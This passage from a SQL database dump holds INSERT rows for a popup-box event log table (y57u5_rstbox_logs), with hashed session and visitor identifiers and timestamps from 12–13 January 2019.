(48523, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 09:52:39'),
(48524, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 09:52:46'),
(48525, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 09:52:55'),
(48526, 'c3e2ef5dd181af83f19d6038fbf0a1be', '86f971d8c824d84a', 0, 2, 1, '2019-01-12 09:53:00'),
(48527, 'a4fbadf43da7c2e910a61f68eb5dc17a', 'fbc9d7ace3bb8e8f', 0, 2, 1, '2019-01-12 09:53:01');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(48528, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 09:53:07'),
(48529, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 09:53:12'),
(48530, 'c3e2ef5dd181af83f19d6038fbf0a1be', '86f971d8c824d84a', 0, 2, 1, '2019-01-12 09:53:48'),
(48531, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 09:53:53'),
(48532, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 09:54:06'),
(48533, '24dfa321beda7d70be46cf7fd765fc41', 'ee957afb7652426c', 0, 2, 1, '2019-01-12 09:54:53'),
(48534, 'bdd84bc1d75c3bf65adf37a50b710436', '788bc96ed5d0e5f3', 0, 2, 1, '2019-01-12 09:55:11'),
(48535, 'bdd84bc1d75c3bf65adf37a50b710436', '788bc96ed5d0e5f3', 0, 2, 1, '2019-01-12 09:55:31'),
(48536, 'bdd84bc1d75c3bf65adf37a50b710436', '788bc96ed5d0e5f3', 0, 2, 1, '2019-01-12 09:55:42'),
(48537, 'c3e2ef5dd181af83f19d6038fbf0a1be', '86f971d8c824d84a', 0, 2, 1, '2019-01-12 09:56:06'),
(48538, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 09:56:35'),
(48539, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2019-01-12 09:57:24'),
(48540, 'a1af0d4179bdbdbc24fea335ec3af0a7', '6d8c93203d1bd217', 0, 2, 1, '2019-01-12 09:57:35'),
(48541, 'bdd84bc1d75c3bf65adf37a50b710436', '788bc96ed5d0e5f3', 0, 2, 1, '2019-01-12 09:57:50'),
(48542, 'ab8db9e9ddc858f40fd46b91fe5e2a3a', '348e7e8f7d24a779', 0, 2, 1, '2019-01-12 09:57:57'),
(48543, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 09:58:01'),
(48544, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 10:00:41'),
(48545, 'ab8db9e9ddc858f40fd46b91fe5e2a3a', '348e7e8f7d24a779', 0, 2, 1, '2019-01-12 10:01:09'),
(48546, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:01:09'),
(48547, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:01:09'),
(48548, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 10:03:20'),
(48549, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2019-01-12 10:04:08'),
(48550, 'd9021539f6b64ee710d76b77e77f07a5', 'd2032fc972069688', 0, 2, 1, '2019-01-12 10:04:11'),
(48551, 'ab8db9e9ddc858f40fd46b91fe5e2a3a', '348e7e8f7d24a779', 0, 2, 1, '2019-01-12 10:04:28'),
(48552, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 10:04:47'),
(48553, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 10:05:04'),
(48554, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 10:07:14'),
(48555, '5179069ae375d87c1bb95d1fa96b5d54', '8e0589df61cad931', 0, 2, 1, '2019-01-12 10:08:06'),
(48556, 'bdd84bc1d75c3bf65adf37a50b710436', '788bc96ed5d0e5f3', 0, 2, 1, '2019-01-12 10:08:06'),
(48557, 'bdd84bc1d75c3bf65adf37a50b710436', '788bc96ed5d0e5f3', 0, 2, 1, '2019-01-12 10:09:55'),
(48558, '607203efd7d91446446917e2d8cb7a7a', '12fc4b801e5257e8', 0, 2, 1, '2019-01-12 10:10:13'),
(48559, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:14:59'),
(48560, 'cc2643a716690baced6a4cc6323e0afe', '80d0e70110ede451', 0, 2, 1, '2019-01-12 10:15:14'),
(48561, 'ab8db9e9ddc858f40fd46b91fe5e2a3a', '348e7e8f7d24a779', 0, 2, 1, '2019-01-12 10:15:38'),
(48562, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:16:50'),
(48563, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:17:59'),
(48564, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:18:03'),
(48565, 'ab8db9e9ddc858f40fd46b91fe5e2a3a', '348e7e8f7d24a779', 0, 2, 1, '2019-01-12 10:18:52'),
(48566, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:20:12'),
(48567, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:20:15'),
(48568, 'd9021539f6b64ee710d76b77e77f07a5', 'd2032fc972069688', 0, 2, 1, '2019-01-12 10:21:40'),
(48569, 'ab8db9e9ddc858f40fd46b91fe5e2a3a', '348e7e8f7d24a779', 0, 2, 1, '2019-01-12 10:21:42'),
(48570, 'd9021539f6b64ee710d76b77e77f07a5', 'd2032fc972069688', 0, 2, 1, '2019-01-12 10:21:57'),
(48571, 'd9021539f6b64ee710d76b77e77f07a5', 'd2032fc972069688', 0, 2, 1, '2019-01-12 10:22:20'),
(48572, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:22:37'),
(48573, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:22:37'),
(48574, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 10:22:38'),
(48575, '2b3581f87b1b56211fa91191886b5693', '02ee6768142e877d', 0, 2, 1, '2019-01-12 10:24:17'),
(48576, '820a15e2a88830b918b9362196b4fe1a', '33ecf9168004aae3', 0, 2, 1, '2019-01-12 10:29:05'),
(48577, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 10:29:21'),
(48578, '820a15e2a88830b918b9362196b4fe1a', '33ecf9168004aae3', 0, 2, 1, '2019-01-12 10:29:35'),
(48579, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 10:30:33'),
(48580, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 10:32:07'),
(48581, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 10:32:18'),
(48582, '8962d9afc25a22692701be4169d2791a', '07f6aefe1a67cdbe', 0, 2, 1, '2019-01-12 10:41:54'),
(48583, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-12 10:42:44'),
(48584, 'bfcfaf137f198140e140b3a6652ea8f4', '9e9edd13f642705f', 0, 2, 1, '2019-01-12 10:43:44'),
(48585, '17f459010933b6977a147d38fbe62183', '82790c28d3444dd6', 0, 2, 1, '2019-01-12 10:44:06'),
(48586, '8962d9afc25a22692701be4169d2791a', '07f6aefe1a67cdbe', 0, 2, 1, '2019-01-12 10:44:09'),
(48587, '6e6c47710cf3c47ab9e58e3ffaea8edf', '6ee2c7e74483bf5b', 0, 2, 1, '2019-01-12 10:45:06'),
(48588, '8962d9afc25a22692701be4169d2791a', '07f6aefe1a67cdbe', 0, 2, 1, '2019-01-12 10:45:37'),
(48589, '6e6c47710cf3c47ab9e58e3ffaea8edf', '6ee2c7e74483bf5b', 0, 2, 1, '2019-01-12 10:47:00'),
(48590, '6e6c47710cf3c47ab9e58e3ffaea8edf', '6ee2c7e74483bf5b', 0, 2, 1, '2019-01-12 10:47:42'),
(48591, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2019-01-12 10:52:40'),
(48592, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2019-01-12 10:53:43'),
(48593, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 10:53:51'),
(48594, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 10:53:54'),
(48595, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 10:54:09'),
(48596, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 10:54:09'),
(48597, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 10:55:27'),
(48598, 'bf2fc40956345703ad3a6045bad67e67', '6dd9e18a6bb43dc0', 0, 2, 1, '2019-01-12 10:56:20'),
(48599, '5179069ae375d87c1bb95d1fa96b5d54', '8e0589df61cad931', 0, 2, 1, '2019-01-12 10:57:15'),
(48600, '086f510134e388c57f9470333c0d2871', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-12 10:59:53'),
(48601, '6e6c47710cf3c47ab9e58e3ffaea8edf', '6ee2c7e74483bf5b', 0, 2, 1, '2019-01-12 11:00:01'),
(48602, '6e6c47710cf3c47ab9e58e3ffaea8edf', '6ee2c7e74483bf5b', 0, 2, 1, '2019-01-12 11:00:08'),
(48603, '086f510134e388c57f9470333c0d2871', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-12 11:00:12'),
(48604, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 11:01:42'),
(48605, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 11:01:54'),
(48606, '6e6c47710cf3c47ab9e58e3ffaea8edf', '6ee2c7e74483bf5b', 0, 2, 1, '2019-01-12 11:02:05'),
(48607, '6e6c47710cf3c47ab9e58e3ffaea8edf', '6ee2c7e74483bf5b', 0, 2, 1, '2019-01-12 11:02:27'),
(48608, '086f510134e388c57f9470333c0d2871', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-12 11:03:02'),
(48609, '2008c6c47230764747115f5dc258d646', '99829f1622697cb3', 0, 2, 1, '2019-01-12 11:03:38'),
(48610, 'd25118d4a828a9696223a0aeb6e20bb5', '0b83b588375e9508', 0, 2, 1, '2019-01-12 11:03:46'),
(48611, '69c2e7f33157958ab8da232708d41570', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-12 11:04:01'),
(48612, 'd25118d4a828a9696223a0aeb6e20bb5', '0b83b588375e9508', 0, 2, 1, '2019-01-12 11:04:21'),
(48613, '69c2e7f33157958ab8da232708d41570', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-12 11:04:52'),
(48614, '69c2e7f33157958ab8da232708d41570', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-12 11:05:07'),
(48615, '69c2e7f33157958ab8da232708d41570', 'ff744a4d90b6a515', 0, 2, 1, '2019-01-12 11:08:13'),
(48616, '4071627029062919b8d39d0a51ab82e0', '17b1d775fb834681', 0, 2, 1, '2019-01-12 11:08:33'),
(48617, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 11:08:45'),
(48618, '4071627029062919b8d39d0a51ab82e0', '17b1d775fb834681', 0, 2, 1, '2019-01-12 11:09:11'),
(48619, '2e987a91a8bd576d3b45c0a9204b419f', '1e45b21e112a0cc6', 0, 2, 1, '2019-01-12 11:14:19'),
(48620, '2e987a91a8bd576d3b45c0a9204b419f', '1e45b21e112a0cc6', 0, 2, 1, '2019-01-12 11:14:48'),
(48621, '086f510134e388c57f9470333c0d2871', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-12 11:15:06'),
(48622, '2184884bb698ebc6bfb827faf19caabb', '8e69b5a9fbca5a1a', 0, 2, 1, '2019-01-12 11:18:48'),
(48623, '2184884bb698ebc6bfb827faf19caabb', '8e69b5a9fbca5a1a', 0, 2, 1, '2019-01-12 11:25:59'),
(48624, 'c1b0e52dee53f13dfddceb701342d81c', 'f728df0bf36f7b83', 0, 2, 1, '2019-01-12 11:26:41'),
(48625, 'db2f72136a58f4e488dc424423222e53', 'f85de81f8eb472cb', 0, 2, 1, '2019-01-12 11:28:07'),
(48626, '2184884bb698ebc6bfb827faf19caabb', '8e69b5a9fbca5a1a', 0, 2, 1, '2019-01-12 11:28:09'),
(48627, 'e931af2ab89cd91754f44f0ed7c837d1', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-12 11:28:14'),
(48628, 'e931af2ab89cd91754f44f0ed7c837d1', 'a0cd7bca03615c8d', 0, 2, 1, '2019-01-12 11:29:01'),
(48629, 'd936464e05022076283480cb791d0d7b', '4e50a6ab17b82ef5', 0, 2, 1, '2019-01-12 11:29:13'),
(48630, 'd936464e05022076283480cb791d0d7b', '4e50a6ab17b82ef5', 0, 2, 1, '2019-01-12 11:29:54'),
(48631, 'c1b0e52dee53f13dfddceb701342d81c', 'f728df0bf36f7b83', 0, 2, 1, '2019-01-12 11:31:37'),
(48632, '5179069ae375d87c1bb95d1fa96b5d54', '8e0589df61cad931', 0, 2, 1, '2019-01-12 11:34:54'),
(48633, '07d416d53341c27ffc01d65c49c4e3b6', 'fbf0576065758144', 0, 2, 1, '2019-01-12 11:45:22'),
(48634, '48e9bcbacb92c3aa25367f87b8acaae3', '62d87d1355179684', 0, 2, 1, '2019-01-12 11:54:19'),
(48635, 'c1b0e52dee53f13dfddceb701342d81c', 'f728df0bf36f7b83', 0, 2, 1, '2019-01-12 11:55:51'),
(48636, 'd936464e05022076283480cb791d0d7b', '4e50a6ab17b82ef5', 0, 2, 1, '2019-01-12 11:56:22'),
(48637, 'c1b0e52dee53f13dfddceb701342d81c', 'f728df0bf36f7b83', 0, 2, 1, '2019-01-12 12:00:32'),
(48638, 'd936464e05022076283480cb791d0d7b', '4e50a6ab17b82ef5', 0, 2, 1, '2019-01-12 12:00:49'),
(48639, 'ac057783828f99d5a637b4f86ea1f485', '8dd171d7f04d93df', 0, 2, 1, '2019-01-12 12:07:13'),
(48640, 'ac057783828f99d5a637b4f86ea1f485', '8dd171d7f04d93df', 0, 2, 1, '2019-01-12 12:07:43'),
(48641, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 12:12:56'),
(48642, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 12:13:39'),
(48643, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2019-01-12 12:19:40'),
(48644, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:19:44'),
(48645, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:19:45'),
(48646, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:20:18'),
(48647, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:21:01'),
(48648, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:21:12'),
(48649, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:21:33'),
(48650, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:21:45'),
(48651, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:22:11'),
(48652, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:22:25'),
(48653, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:22:40'),
(48654, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:23:24'),
(48655, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:23:37'),
(48656, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:23:54'),
(48657, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:24:38'),
(48658, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 12:25:01'),
(48659, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 12:25:29'),
(48660, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:25:50'),
(48661, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 12:26:02'),
(48662, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 12:26:15'),
(48663, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:27:13'),
(48664, '9515b9494c5be95b7f9869d12366c876', '0c6c5e20c30d3ca1', 0, 2, 1, '2019-01-12 12:27:37'),
(48665, '9515b9494c5be95b7f9869d12366c876', '0c6c5e20c30d3ca1', 0, 2, 1, '2019-01-12 12:28:10'),
(48666, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:28:35'),
(48667, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:29:03'),
(48668, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:29:11'),
(48669, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:29:21'),
(48670, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:30:49'),
(48671, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:31:01'),
(48672, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:33:39'),
(48673, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:33:53'),
(48674, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:34:35'),
(48675, '5179069ae375d87c1bb95d1fa96b5d54', '8e0589df61cad931', 0, 2, 1, '2019-01-12 12:35:05'),
(48676, '5179069ae375d87c1bb95d1fa96b5d54', '8e0589df61cad931', 0, 2, 1, '2019-01-12 12:39:45'),
(48677, '70ba0a545d6f33f7a7607ce2b87ecd50', '68e262710bf07c1c', 0, 2, 1, '2019-01-12 12:41:08'),
(48678, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 12:47:55'),
(48679, '9d5e6843e4a4cfa30ab2d999d66aab80', 'c5cb4fe55b6b1b30', 0, 2, 1, '2019-01-12 12:48:14'),
(48680, '2d71a19be527f3b7043ea36a0fa48de9', 'df27b9a2919a8206', 0, 2, 1, '2019-01-12 12:48:40'),
(48681, '1ead222e9f80ee41d8bdf82c01496408', '7b16863d40230e2a', 0, 2, 1, '2019-01-12 13:05:14'),
(48682, 'd9021539f6b64ee710d76b77e77f07a5', 'd2032fc972069688', 0, 2, 1, '2019-01-12 13:07:06'),
(48683, 'd936464e05022076283480cb791d0d7b', '4e50a6ab17b82ef5', 0, 2, 1, '2019-01-12 13:11:58'),
(48684, 'd936464e05022076283480cb791d0d7b', '4e50a6ab17b82ef5', 0, 2, 1, '2019-01-12 13:12:45'),
(48685, 'c1b0e52dee53f13dfddceb701342d81c', 'f728df0bf36f7b83', 0, 2, 1, '2019-01-12 13:14:26'),
(48686, 'c1b0e52dee53f13dfddceb701342d81c', 'f728df0bf36f7b83', 0, 2, 1, '2019-01-12 13:15:31'),
(48687, '9c82d5a7c97aabcac65d957abd982dc4', '6d8c93203d1bd217', 0, 2, 1, '2019-01-12 13:15:57'),
(48688, 'c1b0e52dee53f13dfddceb701342d81c', 'f728df0bf36f7b83', 0, 2, 1, '2019-01-12 13:17:46'),
(48689, '994892ff4622378721135cc4e6369d1d', 'f728df0bf36f7b83', 0, 2, 1, '2019-01-12 13:18:18'),
(48690, '00c1b1dc3b627cb7daa0ff87f5c7ab01', '86f971d8c824d84a', 0, 2, 1, '2019-01-12 13:21:24'),
(48691, '00c1b1dc3b627cb7daa0ff87f5c7ab01', '86f971d8c824d84a', 0, 2, 1, '2019-01-12 13:21:29'),
(48692, '00c1b1dc3b627cb7daa0ff87f5c7ab01', '86f971d8c824d84a', 0, 2, 1, '2019-01-12 13:21:59'),
(48693, '00c1b1dc3b627cb7daa0ff87f5c7ab01', '86f971d8c824d84a', 0, 2, 1, '2019-01-12 13:22:07'),
(48694, '1290981a0e08da8a08c555c636a8bae7', '4e50a6ab17b82ef5', 0, 2, 1, '2019-01-12 13:23:06'),
(48695, 'd9021539f6b64ee710d76b77e77f07a5', 'd2032fc972069688', 0, 2, 1, '2019-01-12 13:25:33'),
(48696, '78a5d3b10d9bbd72521f30c67c6ffce5', '296f389deffb0092', 0, 2, 1, '2019-01-12 13:27:57'),
(48697, '60d65bca102f0e7f0b626feb87132864', 'b160af9b2f3a85d6', 0, 2, 1, '2019-01-12 13:36:47'),
(48698, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 13:46:13'),
(48699, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 13:46:30'),
(48700, 'f371dd247682f00decdc16f52e79acf6', 'b1b974139e0e43c6', 0, 2, 1, '2019-01-12 13:46:41'),
(48701, '03b2c43c0c3eeb459aeab9bab3296c63', '1d5a2d6babf06f9e', 0, 2, 1, '2019-01-12 13:55:28'),
(48702, 'd9021539f6b64ee710d76b77e77f07a5', 'd2032fc972069688', 0, 2, 1, '2019-01-12 14:02:21'),
(48703, '7ee808495e7abd6809e36de73bc5a18b', 'dbece3932856b489', 0, 2, 1, '2019-01-12 14:29:09'),
(48704, '7ee808495e7abd6809e36de73bc5a18b', 'dbece3932856b489', 0, 2, 1, '2019-01-12 14:30:30'),
(48705, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-12 14:42:33'),
(48706, '57daa8bffa49e9b81477d69f354d4924', '6a887ccd4964ed8c', 0, 2, 1, '2019-01-12 14:46:32'),
(48707, '57daa8bffa49e9b81477d69f354d4924', '6a887ccd4964ed8c', 0, 2, 1, '2019-01-12 14:48:47'),
(48708, '443df6d612dc355fa5fe504711e6fcb8', '7c2ebe476c976b04', 0, 2, 1, '2019-01-12 15:26:06'),
(48709, '443df6d612dc355fa5fe504711e6fcb8', '7c2ebe476c976b04', 0, 2, 1, '2019-01-12 15:29:18'),
(48710, 'b18bb6ecda9d72fc34f462194f6ed647', '21a75882f832ae93', 0, 2, 1, '2019-01-12 15:41:02'),
(48711, 'e46be690bebd4be4858a6b5a306dbacc', 'f85de81f8eb472cb', 0, 2, 1, '2019-01-12 17:12:08'),
(48712, '05132ea9ce1529268dda1ee53330873a', '0b83b588375e9508', 0, 2, 1, '2019-01-12 18:37:42'),
(48713, 'bd439e3a072f810fa997cfe20081fcdc', 'd0922dceea1a868e', 0, 2, 1, '2019-01-12 18:41:20'),
(48714, '926c33234fe2c31c6960f7c33d85addc', 'c9364f70ae30f1be', 0, 2, 1, '2019-01-12 18:43:09'),
(48715, 'f65be9a2fcd59a84be3a268b44f6535d', '8cf1f4b8bd4cc593', 0, 2, 1, '2019-01-12 19:13:33'),
(48716, 'b18bb6ecda9d72fc34f462194f6ed647', '21a75882f832ae93', 0, 2, 1, '2019-01-12 19:17:17'),
(48717, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 19:56:24'),
(48718, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 20:05:53'),
(48719, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 20:08:49'),
(48720, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 20:08:57'),
(48721, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 20:09:20'),
(48722, 'f5f44c1c56418529e66459f202ec685b', '93f30eaefda9d8c4', 0, 2, 1, '2019-01-12 20:10:47'),
(48723, '698f75e5a224bfdd9766822c440d1127', 'dc07d53c4c02df9f', 0, 2, 1, '2019-01-12 20:49:20'),
(48724, '698f75e5a224bfdd9766822c440d1127', 'dc07d53c4c02df9f', 0, 2, 1, '2019-01-12 20:50:15'),
(48725, 'f2bcd3a884a7c658e988b51cf36e3315', 'f5741930ba53c5fa', 0, 2, 1, '2019-01-12 21:09:14'),
(48726, 'f2bcd3a884a7c658e988b51cf36e3315', 'f5741930ba53c5fa', 0, 2, 1, '2019-01-12 21:10:32'),
(48727, 'f2bcd3a884a7c658e988b51cf36e3315', 'f5741930ba53c5fa', 0, 2, 1, '2019-01-12 21:11:01'),
(48728, '5c2e4b4ab1e481be7bf1327fae23433f', '2cb2ce3151e438b0', 0, 2, 1, '2019-01-12 21:37:42'),
(48729, '03b2c43c0c3eeb459aeab9bab3296c63', '1d5a2d6babf06f9e', 0, 2, 1, '2019-01-12 21:49:37'),
(48730, '8991d894a999623182ce3c0ca3bb0ef2', 'a2b92167f54c9dc2', 0, 2, 1, '2019-01-12 21:50:19'),
(48731, 'e36c448592a81410a86d4c96aad23fda', '8cc869ef90fb60eb', 0, 2, 1, '2019-01-12 21:51:30'),
(48732, '21f35b76d99a5fd5dace46660fd2c9ee', 'c352e7c70aff483c', 0, 2, 1, '2019-01-12 22:13:18'),
(48733, '21f35b76d99a5fd5dace46660fd2c9ee', 'c352e7c70aff483c', 0, 2, 1, '2019-01-12 22:18:25'),
(48734, '863f3ddf2fd7764e13ce37f5038702a3', '5aaf486d1300b9b9', 0, 2, 1, '2019-01-12 22:32:22'),
(48735, '2d3dbc38ed932c123a0d67de6cc22b37', '37462feb6b538158', 0, 2, 1, '2019-01-13 00:08:00'),
(48736, '094547026c6ccbd8db0b6bd0c7b0d371', 'e3883b33626053d8', 0, 2, 1, '2019-01-13 00:27:17'),
(48737, '2d3dbc38ed932c123a0d67de6cc22b37', '37462feb6b538158', 0, 2, 1, '2019-01-13 00:29:27'),
(48738, '2d3dbc38ed932c123a0d67de6cc22b37', '37462feb6b538158', 0, 2, 1, '2019-01-13 00:31:33'),
(48739, '70f991b1961e304ba4a96e836c5397dc', '5fb345462e4ffadf', 0, 2, 1, '2019-01-13 00:36:28'),
(48740, '312e2cd34348bc0e36da90a6831c5eab', 'f3e9d438246b8b80', 0, 2, 1, '2019-01-13 00:52:03'),
(48741, '312e2cd34348bc0e36da90a6831c5eab', 'f3e9d438246b8b80', 0, 2, 1, '2019-01-13 00:53:38'),
(48742, '312e2cd34348bc0e36da90a6831c5eab', 'f3e9d438246b8b80', 0, 2, 1, '2019-01-13 00:54:02'),
(48743, '5c3c1eb838dd4b3ff6a6334ad6aa7dd5', '162b897c9b72c59c', 0, 2, 1, '2019-01-13 02:57:32'),
(48744, 'b21ce49d82ff351b4af685fd2c10018c', '575b738595cdb2f5', 0, 2, 1, '2019-01-13 03:44:18'),
(48745, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:51:37'),
(48746, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:52:49'),
(48747, '3dc1fdae990caaf1f9d929dc9656a94b', '546887b39507976e', 0, 2, 1, '2019-01-13 04:53:20'),
